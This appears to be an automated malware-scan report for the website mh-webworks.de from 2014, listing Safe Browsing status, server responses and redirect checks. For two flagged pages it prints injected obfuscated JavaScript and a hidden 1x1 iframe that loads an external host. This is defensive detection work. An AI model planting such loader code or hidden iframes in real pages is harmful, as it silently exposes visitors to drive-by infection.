Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mh-webworks.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mh-webworks.de/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 01 Apr 2014 21:57:12 GMT Location: http://www.mh-webworks.de/ Server: Apache Vary: Accept-Encoding Content-Length: 298 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.mh-webworks.de/ | HTTP/1.1 302 Found Connection: close Date: Tue, 01 Apr 2014 21:57:12 GMT Location: /ibiza/webdesign/software/eivissa/islas-balears.html Server: Apache Vary: Accept-Encoding Content-Type: text/html X-Pad: avoid browser bug X-Powered-By: PleskLin | clean |
http://www.mh-webworks.de/ibiza/webdesign/software/eivissa/islas-balears.html | 200 OK Content-Length: 23604 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}
if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,62,6c,62,5a,5f,58 Antivirus reports:
Hidden iFrame found. The same iFrame was found in 15 websites. size: 1x1 src: http://lfmonline.de/test/test.php <iframe src="http://lfmonline.de/test/test.php" width="1" height="1" frameborder="0"> | ||
http://www.mh-webworks.de/test404page.js | 200 OK Content-Length: 23604 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}
if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,62,6c,62,5a,5f,58 Antivirus reports:
Hidden iFrame found. The same iFrame was found in 15 websites. size: 1x1 src: http://lfmonline.de/test/test.php <iframe src="http://lfmonline.de/test/test.php" width="1" height="1" frameborder="0"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mh-webworks.de
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Apr 2014 21:57:12 GMT
Location: http://www.mh-webworks.de/
Server: Apache
Vary: Accept-Encoding
Content-Length: 298
Content-Type: text/html; charset=iso-8859-1
...298 bytes of data.
GET / HTTP/1.1
Host: mh-webworks.de
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Apr 2014 21:57:12 GMT
Location: http://www.mh-webworks.de/
Server: Apache
Vary: Accept-Encoding
Content-Length: 298
Content-Type: text/html; charset=iso-8859-1
...298 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mh-webworks.de
Referer: http://www.google.com/search?q=mh-webworks.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mh-webworks.de
Referer: http://www.google.com/search?q=mh-webworks.de
Result:
The result is similar to the first query. There are no suspicious redirects found.